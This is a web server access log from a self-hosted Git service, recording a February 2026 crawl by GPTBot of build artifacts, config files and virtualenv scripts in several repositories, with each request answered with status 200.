"/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13184] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13185] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13185] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13183] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13187] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11373] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11701] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:16:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:16:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:16:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11373] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13015] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:16:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19902] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:16:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 